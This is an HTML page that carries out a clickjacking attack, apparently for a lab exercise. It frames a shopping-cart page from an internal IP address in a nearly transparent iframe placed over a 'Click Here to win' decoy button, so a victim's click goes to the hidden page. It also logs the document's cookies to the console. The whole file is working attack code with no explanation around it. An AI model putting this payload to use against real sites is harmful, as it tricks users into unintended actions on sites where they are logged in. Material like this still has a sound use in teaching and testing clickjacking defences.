<!DOCTYPE html>
	<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests" />
    <body>
        <style>
            iframe{
                position: relative;
                width: 100%;
                height: 100%;
                border-color: transparent;
                opacity: 0.1;
                z-index: 2;
            }
            form {
                position: absolute;
                top: 178px;
                left: 250px;
                opacity: 1;
                z-index: 1;
            }
            .submit_{
                position: absolute;
                left: 900px;
				top:190px;
                opacity: 1;
                z-index: 1;
            }
        </style>
        
		<iframe src="http://10.116.2.108/cart"></iframe>
		<script>console.log(document.cookie)</script>
        <form  method="get">
            <input class="submit_" type="submit" value="Click Here to win" center>
        </form>
         
    </body>
</html>
